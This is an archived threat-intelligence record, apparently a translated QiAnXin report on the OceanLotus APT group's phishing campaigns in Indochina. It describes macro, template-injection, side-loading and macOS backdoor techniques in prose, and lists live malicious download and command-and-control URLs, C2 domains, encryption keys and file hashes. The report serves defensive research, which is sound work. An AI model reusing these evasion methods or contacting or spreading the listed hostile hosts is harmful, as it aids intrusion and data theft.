{
	"id": "5c985505-30e5-4ceb-97a9-425337e826d7",
	"created_at": "2026-04-06T00:14:15.664886Z",
	"updated_at": "2026-04-10T03:36:48.224694Z",
	"deleted_at": null,
	"sha1_hash": "a76f3d080039a78ae0632cfb3e281e6143bf3534",
	"title": "奇安信威胁情报中心",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 15883354,
	"plain_text": "奇安信威胁情报中心\r\nArchived: 2026-04-05 23:07:26 UTC\r\nOverview\r\nOceanLotus is an APT Group with alleged Vietnamese background. The group was first revealed and named by\r\nSkyEye Team in May 2015. Its attack activities can be traced back to April 2012. The targets include China's\r\nmaritime institutions, maritime construction, scientific research institutes and shipping enterprises.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 1 of 79\n\nIn fact, according to reports of various security vendors, OceanLotus also attacked several countries, including\r\nCambodia, Thailand, Laos, even some victims in Vietnam, like opinion leaders, media, real estate companies,\r\nforeign enterprises and banks.\r\nRedDrip Team (formerly SkyEye Team) has been to OceanLotus to keep track of high strength, groupactivity,\r\nfound it in the near future to Indochinese Peninsula countries since 2019 the latest attack activity used in the initial\r\nlaunch load files and attack using the technology, and combined with the QiAnXin threat intelligence data,\r\nassociated with a series of attacks.\r\nIn this report, we share our summary of the latest attack techniques, attack payloads and related attacks of the\r\nOceanLotus, hoping that we can jointly improve understanding of OceanLotus group, an extremely active APT\r\ngroup.\r\nAttacks on Countries\r\nThe following is a list of typical cases of attacks against some countries on Indochinese Peninsula since the end of\r\n2018. For other unmentioned samples, please refer to the IOC list at the end of this report.\r\nVietnam\r\nBait Compression Files\r\nOn April 1, 2019, RedDrip discovered a Vietnamese file name \"Hop dong sungroup.rar\" in the process of daily\r\nmonitoring the attack activities of the OceanLotus.\r\nThe English version is \"Sun Group contract\". 
The compressed package contains winword.exe, renamed to \"Noi dung chi tiet hop dong sungroup can chinh sua\".\r\nIn addition, we correlated another decoy package, SUN_GROUP_CORPORATION, which translates as \"Sun Group Corporation\". The file name inside the zip package is as follows:\r\nNoi dung can xac thuc va sua GUI den CONG TY CO PHAN TAP DOAN MAT TROI Bo Tai chinh.exe\r\nIt turns out that Sun City Group is one of the largest real estate developers in Vietnam.\r\nBoth samples were uploaded from Vietnam, so we speculate that OceanLotus was conducting phishing attacks against Sun City Group's internal staff.\r\nIn addition to targeting the Vietnamese real estate industry, we also found that the group conducts phishing attacks against the national bank of Vietnam:\r\nThe compressed package of the related samples is called cplh-nhnn-01-209.rar. The samples are dated January 22, 2019, and the attack most likely occurred around that time.\r\nThe translated name of the compressed package is \"national bank of Vietnam -- 01-209.rar\"; the winword.exe in the package was renamed \"chiphilienhoannhnn-bc209.exe\", which translates as \"state bank of Vietnam sbv-bc 209.exe\".\r\nSBV refers to Vietnam's central bank, the State Bank of Vietnam, while BC actually refers to B2C, i.e. third-party payment.\r\nThis attack was likely launched against the bank's internal staff, disguised as the document transmission process for third-party payments within the bank.\r\nThere is also phishing that uses anti-virus software related information as a disguise.\r\nCompressed package name: \"Gui lai cho MS.MAI post content kaspersky.rar\" (return MS.MAI post content kaspersky)\r\nWe also see oil used as a phishing theme:\r\n\"Tinh dau can mua\" (essential oil required); the PE file in the package is called \"details about purchase and purchase\".\r\nBait Documents\r\nThe compressed package above uses the Kaspersky name as a lure, and there is a similarly named decoy document, \"Content marketing kaspersky.doc\". When opened, the document displays the following: a Vietnamese-language prompt that induces the user to click and enable macros.\r\nWe also found a large number of OceanLotus phishing attacks disguised as resumes (CVs), which we internally named the OceanCV activity. This activity exposes all three of the macro attack techniques commonly used by OceanLotus.\r\nFirst we analyze the sample names. They all start with CV and follow three main naming patterns:\r\n1. CV-name (e.g. cv-nguyenquynhchi.docx)\r\n2. CV-name-position (e.g. CV-AnthonyWei-customerservice.docx)\r\n3. 
CV-random number+English (e.g. Cv-103237-ewqdsd.doc)\r\nIt is worth noting that some samples display a prompt after opening indicating that macros need to be enabled:\r\nHowever, when you scroll down, you will find a resume written in Vietnamese. This is true for most of the samples in this series of activities, and the resumes differ from sample to sample.\r\nThese phishing resume samples use different methods. Some use the OceanLotus MSO macro (internally named MSOMacro by RedDrip):\r\nSome use template injection techniques:\r\nSome use the technique of hiding the macro code in the document as 1-point font text (later upgraded to white 1-point font; internally named OHNMacro by RedDrip).\r\nIn the following sections we will examine each of these three macro techniques in detail.\r\nStarting from this batch of resume samples, we correlated homologous samples for these three types of macro document across various dimensions, and finally found a large number of malicious macro samples exclusive to OceanLotus. 
Please refer to the relevant section on Office samples for details.\r\nExploit Vulnerabilities of Eternal Blue\r\nWe also found that OceanLotus used the \"Eternal Blue\" series of vulnerabilities to target companies in Vietnam that provide software to the government.\r\nWebsite: https://www.tandan.com.vn/portal/home/default.aspx\r\nTAN DAN JSC is a Vietnamese software company.\r\nThe company provides the government with mail servers, official gazette database systems, citizen management systems and more.\r\nAfter a successful attack, it delivers Trojan horses. These are consistent with the Trojans that used Eternal Blue to attack colleges and universities in the report \"Suspected early attack activities of the OceanLotus group against domestic colleges and universities\", which we compiled last year:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-targets-chinese-university/\r\nPhishing Attacks by Exploiting WinRAR Vulnerability\r\nIn addition to traditional malicious payloads that use the \"white plus black\" technique (a legitimate executable loading a malicious DLL) and malicious payloads planted in tweets and on websites, OceanLotus also exploits the latest WinRAR vulnerability to launch attacks against Vietnam. Here is one of the cases we captured:\r\nThe package name is \"tut_photoshop_scan_bank_id.rar\".\r\nThe file extracted when the vulnerability is triggered is named CocCocUpated.exe\r\nCOCCOC is a Vietnamese technology company founded in 2013 that provides an online search engine and a browser. Its main languages are Vietnamese and English; its search service is the most mature in Vietnam, and its browser is based on Google Chromium and supports the Windows and iOS platforms.\r\nThrough analysis, we found that it is the early Trojan framework of OceanLotus; we also cover it separately in the sample analysis section.\r\nBesides the lures above, we also found OceanLotus exploiting the vulnerability with a compressed package that embeds MP4 files. The package name translates roughly as \"Cho Ray hospital exclusive blockbuster movie\", where Cho Ray refers to Chợ Rẫy Hospital in Ho Chi Minh City, Vietnam's largest general hospital.\r\nThe package contains two MP4 files, one with the same name as the package, and another video whose name translates as \"the team began staffing after the exclusive stroke press release\".\r\nSimilarly, it drops coccocupdate.exe.\r\nIts distribution method is to place it on online network drive (cloud storage) services.\r\nThis new Trojan horse will be analyzed in detail in the sample analysis section.\r\nMAC Backdoor\r\nIn addition to targeting Vietnam on the Windows platform, OceanLotus also attacks Vietnamese users on the macOS platform. 
The following samples are typical of recent launches; they are disguised as browser updates, Flash installer update packages, font installation packages or documents, but actually run a malicious installer.\r\nInterestingly, when we analyzed the sample disguised as Firefox, it showed a Firefox installation interface after opening. Double-clicking the Firefox icon executes the Trojan:\r\nWhen you click update, the download progress bar appears even if you are disconnected from the Internet.\r\nThis is the fake interface the attacker drew:\r\nSimilarly, this batch of macOS samples targeting Vietnam is analyzed further in the following chapters.\r\nCambodia\r\nHere is this year's latest attack on Cambodia by OceanLotus, called \"report-no.0162(02 Pages).doc\".\r\nThe execution flow of the sample is shown in the following figure:\r\nThe samples correlated by homology are as follows:\r\nMD5 Filename Create time\r\n56b5a96b8582b32ad50d6b6d9e980ce7 Request Comment on UYFC.doc 2019-03-18 04:12:00\r\n3fd2a37c3b8d9eb587c71ceb8e3bb085 No.039714(cdri).doc 2019-03-25 04:33:00\r\nThe correlated sample for the Cambodia attack is Request Comment on UYFC.doc.\r\nUYFC is a Cambodian youth federation NGO; this attack targets people who might be associated with its conference.\r\nDocument screenshot:\r\nNo.039714(cdri).doc\r\nIt is clear that the attack on Cambodia also used OHN macros.\r\nIn addition to documents, OceanLotus also attacked Cambodia last year using macOS samples. Related sample: \"Scanned Investment report-july 2018.zip\"\r\nThailand\r\nTypical examples of attacks by OceanLotus against Thailand since 2019 are as follows:\r\nMD5 Filename Create time\r\n4c30e792218d5526f6499d235448bdd9 Form_Provisional Agenda of the ASEAN Senior Officials Preparatory Meeting.doc 2019-01-21 02:25:00\r\nd8a5a375da7798be781cf3ea689ae7ab Program Retreat.doc 2019-01-14 03:50:00\r\nThe first is named Form_Provisional Agenda of the ASEAN Senior Officials Preparatory Meeting.\r\nThis meeting was actually held in Thailand on April 6, 2019. From the creation time and upload time of the document (2019-03-22), it can be seen that OceanLotus has a strong ability to obtain current affairs information and a long preparation cycle.\r\nThe second document, Program Retreat, may target the military, but its generic name makes the attacker's intent hard to pin down.\r\nThe document contents of the two files in the above table are the same. The following is a screenshot after restoring the shellcode font in the document:\r\nIt also uses OHN macros.\r\nSample Analysis\r\nMSO Macro Documents\r\nThe \"MSO macro\" of OceanLotus has common characteristics. We analyzed one sample; the extracted macro code is as follows:\r\nFirst it assembles the data through the Data variable, base64-decodes it to obtain the VBS code, writes it to msohtml.log, and copies wscript.exe to Windows\\SysWOW64\\msohtml.exe:\r\nIt then executes the msohtml.log script with the copied msohtml.exe (that is, wscript.exe), as shown in the figure below:\r\nAnd creates a scheduled task:\r\nThe contents of the msohtml.log script are as follows. It XORs the data in the cs array with 518 and executes the result:\r\nThe decrypted script, as shown in the figure, executes the malicious code after XORing the elements of its cs array with 415:\r\nThe decrypted malicious code, shown in the figure, downloads code from https://open.betaoffice.net/cvfemale.png and executes it.\r\nOHN Macro Documents\r\nWe extracted the macro code from the sample. Opening the Word document prompts the user to enable macros; once macros are enabled, this function executes:\r\nIt then copies the Office document to the Temp directory under a random name, as shown in the figure:\r\nThen it modifies the macro security setting in the registry:\r\nIt takes the data from the last five paragraphs of the document (5 paragraphs in total: 2 blank lines and 3 containing hex data), converts it from hex to binary, adds it as macro code to the new file, and then sets the x_N0th1ngH3r3 method to execute that macro code after 1 second:\r\nThe data is formatted as 1-point text, which cannot be seen by the naked eye, as shown in the figure:\r\nThe first paragraph clears the data after formatting:\r\nAfter the data is converted to binary, it becomes the second macro code, and the first macro code executes the x_N0th1ngH3r3 function, as shown in the figure:\r\nThe macro code in the third-from-last paragraph is executed in the same way, as shown in the figure:\r\nIt also starts with this function:\r\nIt takes the data of the penultimate paragraph, as shown in the figure:\r\nThe data is as follows:\r\nThen it writes the data to memory for execution:\r\nAfter the hex data is converted to binary, it is the shellcode most commonly used by OceanLotus, shown as follows:\r\nConfiguration file:\r\nThis is how shellcode is loaded through three layers of macros, mostly to defeat static detection of the shellcode.\r\nTemplate Injection Documents\r\nThe template injection documents of OceanLotus follow a common pattern: when the document opens, it loads XXX.XXX/XXX.PNG and does the following.\r\nTo give an example of one of these attacks, fdsw.png is an Office compound document:\r\n(d497bd06b34a046841bb63d3bf20e605)\r\nIt checks whether the file SysWOW64\\cmd.exe exists to determine whether the system is 32-bit or 64-bit.\r\nDepending on the system, it takes the corresponding file out of a cell, base64-decodes it, and drops it under %appdata% as main_background-png:\r\nThe hijacked CLSID is \"{2dea658f-54c1-4227-af9b-260ab5fc3543}\".\r\nAccording to this CLSID, the DLL that is hijacked is %SystemRoot%\\System32\\playsndsrv.dll, which is used to play sound.\r\nThe base64 content extracted from the cell is as follows:\r\nBase64-decoding it yields a 32-bit PE whose DllMain allocates 0x34aca bytes of memory, writes the shellcode at 0x10012760 into it, and executes it in a thread:\r\nThe shellcode passes a pointer to offset 0xfc8 as the parameter to the function sub_160018:\r\nOffset 0xfc8 holds a command line argument and a PE:\r\nThe function sub_160018 mainly loads that PE in memory and then runs it according to the command line parameters passed to it. The figure below is the PE's code for receiving the command line parameters:\r\nIt requests the URL, DES-decrypts the downloaded data, and loads it in memory.\r\nCorrelation analysis finds more samples:\r\nSorted by compile time as follows:\r\nComparing the table, the command line of the first sample is different from the other samples. 
It can be inferred that it belongs to a different attack. This sample is the annotated version, which loads shellcode in memory in the same way.\r\nThe PE included in the file is found in a hacker toolkit. Its file name is CMD [w7][x64].\r\nThe function of this sample is to execute McOds.exe (the file name of a \"white\" legitimate utility program abused by OceanLotus) through the CMD [w7][x64].exe contained in the file; McOds.exe should be the file released earlier by the dropper.\r\nThis sample was uploaded from VN on July 31 under the file name msvchr.exe, so it should be aimed at attacks on Vietnam:\r\nThrough the analysis and comparison of these samples, we can see that they are loaders built specifically to execute an exe file in memory and pass command line parameters to it. This is a new malicious code framework used in the last six months, developed specifically to evade static detection.\r\nTwo samples are found to be 10M, with the end padded with 0x20 (space) bytes to make them large files and avoid being uploaded:\r\nThe way shellcode is loaded also differs a little between these samples:\r\n1. Most samples execute the shellcode by creating a thread.\r\n2. The earliest compiled version of the sample is in the form of a service, with comments, and creates a thread in ServiceMain to execute the shellcode.\r\n3. 
A small number of samples execute the shellcode directly on the main thread.\r\nwwlib DLL Injection\r\nAnalysis of the compressed package cplh-nhnn-01-2019.rar, downloaded from Amazon AWS, shows that the package contains winword.exe.\r\nThe attackers abuse winword.exe as a \"white\" (legitimate) executable: by default winword.exe loads wwlib.dll from the same directory.\r\nThe reason they abuse winword.exe is that its icon is the Word icon and wwlib.dll is hidden, so they only need to rename winword.exe.\r\nThe malicious code in wwlib.dll is in the FMain export function; winword.exe calls the FMain export by default on startup, so the malicious code is executed. It then base64-decodes the shellcode that comes with it and executes it in the main thread:\r\nLocation of the base64-encoded shellcode in the sample:\r\nThe decoded shellcode is found to be loaded in the same way as the previous shellcode. The data at offset 0x6b6 is passed to the sub_16 function as the parameter:\r\nThe function sub_16 is used to decrypt the data following 0x6b6, obtaining the second shellcode, and to execute it. 
The figure below is the decrypted second shellcode:\r\nThe second shellcode DES-decrypts the third layer using the key \"asfahdiuqhu93ye7891h9ubioufcf\":\r\nThe entry of the third-layer shellcode is the same as that of the first two: it uses the call/pop technique to find the position where the shellcode is loaded in memory, then passes the data following the code (at offset 0x8c6) as the parameter to the sub_16 function. The parameter passed is https://office.allsafebrowsing.com/AwPT:\r\nThe shellcode downloads a file from https://office.allsafebrowsing.com/AwPT and then executes it in memory; the image below shows the UA used to download the file:\r\nThe downloaded AwPT file is a Cobalt Strike shellcode module:\r\nThe following figure shows the algorithm for decrypting the data attached at the end. 
It is the same as the Cobalt Strike shellcode module's; the difference from before is that the shift moves 8 bytes backward:\r\nThe decrypted data is a Beacon module, as shown in the figure:\r\nThe extracted configuration information is as follows:\r\nMAC Backdoor\r\nThe object of analysis is a Mac backdoor disguised as a browser.\r\nThe extracted file structure is as follows; it is a macOS installation package, as shown in the figure:\r\nAfter opening it, the Firefox installation interface is displayed. Double-clicking the Firefox icon executes the Dropper process:\r\nIt pops up a fake Firefox interface. After clicking update, the download progress bar appears even if the Internet is disconnected, because it is forged by the attacker:\r\nThis is the fake interface the attacker drew:\r\nAfter running, the Dropper creates the following launch agent in the Library directory for persistence at startup:\r\n/Users/username/Library/LaunchAgents/com.apple.spell.agent.plist\r\nThe launch agent points to the file /Users/username/Library/Spelling/spellagentd, a macOS binary that has been packed; it decrypts the shellcode in memory and executes it, as shown in the figure:\r\nAfter execution it connects back to the address rio.imbandaad.com, sending packets to the server through a POST request:\r\nhttp://rio.imbandaad.com/v3/yQ/r/eiCu1gd6Qme.js\r\nBut the address is no longer valid. The signature information of the App is as follows:\r\nCocCocUpdate\r\nCocCocUpdate is a Dropper that is released into the startup directory by a compressed package crafted to exploit the CVE-2018-20250 vulnerability. The screenshot of the compressed package is as follows:\r\nAfter restart, it is executed by the system; the corresponding file is coccocupdate.exe. In 2015 we exposed a Dropper version that passed a random key through command line parameters. This coccocupdate.exe is improved to pass the random key through environment variables.\r\nThe specific steps are as follows:\r\n1. Get the full path of the executed coccocupdate.exe and store it in an environment variable named \"C091A8C8\" for later reading.\r\n2. Randomly generate a 128-byte key and store it in an environment variable named \"DB99050C\"; it is used to encrypt the shellcode data that follows.\r\n3. 
Encrypt the data at 0x40E000 with the random key, write the modified PE file to the Temp directory, and then execute it through CreateProcess:\r\nThe following figure shows the comparison between the original file and the encrypted file. It can be seen that there is no change in the code segment; only the global variable array at 0xd000 is encrypted with the random key.\r\n4. If the file is bundled, it decrypts and releases a bundled file (the key is in the last 64 bytes) from a resource of type 10 and resource ID 1, such as a Word document or a normal file, and then executes it through ShellExecute. This file does not bundle a decoy file, so the resource ID does not match:\r\n5. The process executed from Temp first determines whether the \"C091A8C8\" environment variable is set. If it is,\r\nmeaning it was encrypted by the original Dropper, it reads the randomly generated 128-bit key from the \"DB99050C\" environment variable, decrypts the code at 0x40e000, and then decrypts one more layer and decompresses one more layer, because in the original Dropper the code has one layer of encryption and compression:\r\nExtract:\r\n6. 
The decrypted file is a PE file, which is executed in memory after decryption, as shown in the figure:\r\nThis code releases 3 files to the c:\\program files\\Microsoft\\Windows\\system restore\\ directory:\r\nIt then creates a service pointing to the rstrui.exe file:\r\nrstrui.exe is a loader written by the attacker, disguised with the Microsoft Windows System Restore icon:\r\nIt is mainly responsible for loading {9fbaa883-1709-4de3-8c1b-48683f740a5f} from the same directory through rundll32.\r\nThe file named {9fbaa883-1709-4de3-8c1b-48683f740a5f}.clsid is a DLL loader; its PE information is as follows:\r\nThe function of this DLL is mainly to decrypt and load the shellcode file in the same directory named {9fbaa883-1709-4de3-8c1b-48683f740a5f}, as shown in the figure:\r\nEntering the sub_10001480 function, the contents of the file are decrypted and the PE is loaded in memory:\r\nThe PE after decryption in memory is shown in the figure below:\r\nDllMain creates a thread to execute the export function Version. In the Version function, the remote control routine is executed continuously. 
If it fails, it sleeps 6 seconds and continues.\r\nThen a random number less than 4 is generated to randomly select a C2, as shown in the figure:\r\nOne of the functions used to decrypt the C2 addresses is as follows:\r\nThe 4 domain names are as follows:\r\nimages.ucange.com\r\npreload.ointalt.com\r\nmaintenance.allidayser.com\r\nreport.cottallid.com\r\nThe hashes of the samples associated with these domain names are as follows:\r\n2ea902abe453b70cf77e402cc16eb552\r\ncc7b9ee1b026e16a9d37e3988a714479\r\ne60c35dd36c9f525007955e6b3a88b82\r\nBundled files in these homologous samples:\r\nThe content of the Office file bundled in cc7b9ee1b026e16a9d37e3988a714479 is as follows:\r\nTranslation:\r\nThe content of the Office file bundled in 2ea902abe453b70cf77e402cc16eb552 is as follows:\r\nTranslation:\r\nThe flow chart of the Dropper is as follows:\r\nA comparison between this version of the Dropper and the 2015 version:\r\n1. 
The 2015 Dropper passed the randomly generated decryption key through a command line parameter, while this version passes the key between the processes in the chain through environment variables (the APIs are SetEnvironmentVariableW and GetEnvironmentVariableW).\r\n2. The 2015 version contained a virtual machine check; this version has no virtual machine check.\r\nThe following figure shows the 2015 version of the OceanLotus Dropper passing the key through \"--ping\":\r\nThe following figure shows this Dropper version storing the randomly generated key in an environment variable:\r\nCorrelation Analysis\r\nTrojan Samples\r\nThrough analysis of the general backdoor of OceanLotus, a large number of homologous samples were found through features in its code.\r\nMAC Backdoor\r\nIn the previous chapter, we found that the C2 rio.imbandaad.com resolved to 198.15.119.125. When we checked this IP again, we found that one of the domain names hosted on it, web.dalalepredaa.com, had been labeled as OceanLotus.\r\nThrough this domain name, we discovered OceanLotus's newest MAC sample.\r\nTo disguise itself as a document, the sample first uses a folder name in which the \"d\" of docx is replaced by the lowercase Roman numeral five hundred (ⅾ), to deceive users: Don khieu nai.ⅾocx\r\nOn Windows it looks like this:\r\nOn the macOS system it shows the Office icon of a docx file, but it is actually a directory:\r\nThis is because iconFile in info.plist points to the iconFile of a doc, as shown below:\r\nThe following is the signature information of the sample, as shown in the figure:\r\nAfter the sample is executed, three directories are created in the Library directory:\r\nLaunchAgents\r\nMedia\r\nVideo\r\nA startup item named LaunchAgents is installed for persistence:\r\nThis item points to the mediaagentd program in the Video directory:\r\nAt the same time, the previous directory is replaced by a real docx file, to serve as a diversion:\r\nThe released mediaagentd program is packed and is loaded and executed in memory after decryption:\r\nThe unpacked macOS file is as follows:\r\nAt the entry point of the file there is a while loop, which collects computer information and sends it, enters the loop function of the remote control, sleeps for a random period of time, and repeats the process:\r\nMany of the internal strings are encrypted. The following is where the encryption function is used:\r\nDecryption is mainly done through CCCrypt; the algorithm is AES with an IV of 0, as shown in the figure:\r\nAES encryption key (HEX): 4e620abedafb4d9866cc9d9c2d29e2d7ea18adf1, zero-padded to a length of 32:\r\nThe decrypted data is as follows:\r\nThe collected information is encrypted with AES and sent through the CURL library:\r\nThe message distribution function of the remote control is as follows: different operations are performed according to the token at the beginning of the message. The following is the operation of listing a directory:\r\nThe key used for data transmission is different from the key used for decrypting strings. The following is the encryption key for data transmission:\r\n07e74ff2ce9688c8f79b91ab32c95d11c140d3ac\r\nSome string decryption routines first base64-decode and then AES-decrypt:\r\nBut the base64 used in the decryption is not the standard base64. 
The following figure shows the base64 table of the malicious code:\r\nThe encrypted data is sent to the C2, as shown in the figure below:\r\nC2: web.dalalepredaa.com\r\nIt is worth noting that some of the recent OceanLotus Mac samples were found to be signed. After deduplication, we found two commonly used signatures:\r\nMelinda Cline (P74QRJXB2F)\r\nDAVID DOWELL (B5YH6VDVRE)\r\nOffice Documents\r\nThrough correlation analysis, it was found that the macro document sample and a large number of other samples have the same origin.\r\nAs can be seen from the comparison case below, the document contents were created at the same time and by the same author.\r\nThe following figure shows the template feature; the template file name is very characteristic of OceanLotus.\r\nAfter analysis, we summarized the author names commonly used in OceanLotus attack documents, among which the largest attack activities were the \"DEV\" activity and the \"Tushar\" activity.\r\nAfter correlation analysis across various dimensions, the document names and hash values involved in this series of malicious macro document delivery activities were obtained.\r\nDocument name MD5\r\nTest.doc 5c9ef8b5263651a08ea1b79057a5ee28\r\nScan_Mau_Ao_Thun.doc b858c08cf7807e462ca335233bd83fe7\r\nContent marketing Kaspersky.doc c313f8a5fd8ca391fc85193bc879ab02\r\nDoc.doc 473fdfefa92725099ca87e992edbc92c\r\nLY_ANH_TRUNG_CV.doc 02cec2f17a7910b6fa994f340bbbc297\r\nLY ANH TRUNG CV.doc dd5ae0c0a7e17d101f570812fec4e5e4\r\nLY_ANH_TRUNG_CV.doc 90e5ff68bf06cb930ed8c040139c4650\r\nLY_ANH_TRUNG_CV.doc 6db450c4c756071ecafff425d6183d7d\r\nCV - DucNguyenMinh.doc cb39e2138af92c32e53c97c0aa590d48\r\nCV, Nguyen Minh Duc.docx 8e13895504e643cd8e0e87377b25bd6b\r\nDanh sach can bo vi pham.doc d3c27f779d615a1d3a35dff5e9561eb0\r\nDanh Sach Nhan Vien Bien Thu Tien Cong Ty.docx 27425360d18feea54860420006ea9833\r\nDanh Sach Nhan Vien Bien Thu Tien Cong Ty.docx cf0142da12509f544a59093495c3a6dd\r\nCV - AnthonyWei - CustomerService.docx b1df440e5dd64ffae9f7e792993f2f4c\r\n878fa022bd5e5caf678fe8d728ce42ee\r\nf78be074f6bc67a712e751254df5f166\r\nHo Chi Minh.docx e2aed850c18449a43886fc79b342132f\r\nDS - Card - ChienThang - TraVinh.docx 74b456adf2ae708789fb2d34ecccb954\r\nHopDong - XXX - TP - 092018.docx 72263750df84e24fe645206a51772c88\r\nBBLV_ASC_DG_092018.docx 3a574c28beca4f3c94d30e3cf3979f4c\r\nIndo.docx ee836e0f7a40571523bf56dba59898f6\r\nDanh sach cac nha đấu tranh bị bắt 2.9.doc f6068b672a19ce14981df011a55081e4\r\n00ac0d7337290b74bdd7f43ec4a67ddb\r\nAfter analyzing the bait names of these samples, each has its own characteristics:\r\n1. The names have political characteristics: a list of arrested activists.\r\n2. Resume baits are included. These can be linked to an email analyzed by security researcher @vupt_bka involving OceanLotus resume phishing: https://twitter.com/vupt_bka/status/1083653486963638275\r\n3. Some documents show an inducement to enable the macro that is inconsistent with the earlier inducement interface.\r\nIn addition, historical samples also differ from the latest samples in technique. 
As shown below, some historical samples do not use template injection, but execute macro code directly, and the code to be executed is shown in the document content, namely the OHN macro code mentioned in the sample analysis section.\r\nAfter correlation analysis of the macro samples mentioned above, it can be found that the earliest such attack was in 2017. Judging from the file name, the bait document uploaded from Vietnam was very probably a test sample:\r\nSAMPLES 08_11__12_2017 (317).\r\nc4d35f3263fef4a533e7403682a034c3\r\n4. The most frequent series is the Vietnamese file protection bait.\r\nCompression Files\r\nIn the process of analyzing the Thu moi 209.rar sample of OceanLotus, we found that the generation time of the sample was suspected to have been customized.\r\nAs seen from the upload time of the sample, it was uploaded to VT on March 1, 2019, and the difference from the timestamps inside the compressed package is too large.\r\nTherefore, after correlating on this time, we found multiple related OceanLotus samples.\r\nFile name MD5\r\n60982849-c8e4-4039-8f59-dfb78d8bab0d\r\n15f5adf1-8798-49bf-a6c3-d90b69eb6664 bcbc1bef20d2befdd290e31269e0174a\r\n4052d2e7-cd4c-a424-8841-52f782bba411 dfaa343552e8d470096a0a09a018930f\r\nffea6446-e47a-b7a4-b7ff-e461f9775177 9b1ce9df321ce88ade4ff3b0ada5d414\r\n5d47e097-c3bc-401e-8c0f-e877280b368a da14eece6191551a31d37d1e96681cd1\r\nThu moi 2019.rar 76289f02a0b31143d87d5e35839fb24a\r\nTherefore, it can be further confirmed that the OceanLotus group customizes the sample generation time and generates samples in batches for delivery.\r\nConclusion\r\nThis report covers a large number of attacks on Indochinese Peninsula countries and the resources used by the OceanLotus group, revealing its unending history of attacks, extremely wide range of targets and very creative technical means. In its attacks the group is always changing baits, payloads and AV evasion techniques, and even its domain name assets are constantly evolving, reflecting a very strong capability and will to attack.\r\nTherefore, while tracking the attack activities of OceanLotus against China, we extend our understanding of the TTPs of this notorious group. This process will never end.\r\nIOCs\r\nCorrelated PE files:\r\n2f9af6b9d73218c578653d6d9bd02d4d\r\nc9d29501410e19938cd8e01630dc677b\r\nURL:\r\nhttp[:]//download-attachments.s3.amazonaws.com/db08b565038ac83e89e7b55201479f37ea49e525/f0c6ea8e-d2f8-445f-b649-57808b2015b7\r\nMAC signatures:\r\nMelinda Cline (P74QRJXB2F)\r\nDAVID DOWELL (B5YH6VDVRE)\r\nAES KEY:\r\nDecrypted String 4E620ABEDAFB4D9866CC9D9C2D29E2D7EA18ADF1\r\nEncrypted Packet 07E74FF2CE9688C8F79B91AB32C95D11C140D3AC\r\nAppendix\r\nRedDrip Team\r\nRedDrip Team of QiAnXin (formerly SkyEye Team), founded in 2015, focuses on the research of APT attacks. As the first team to reveal OceanLotus (APT-C-00) attacks, RedDrip Team is also a key part of the QiAnXin Threat Intelligence Center.\r\nOur team has security analysts and developers covering the full cycle of threat intelligence operation: data sourcing, processing, analysis and correlation. Our threat intelligence supports QiAnXin products and third-party products.\r\nRelying on leading security data capacity and security expertise, we have found several noteworthy APT campaigns, including OceanLotus.\r\nFollow us on WeChat\r\nSource: https://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/"
	],
	"report_names": [
		"oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
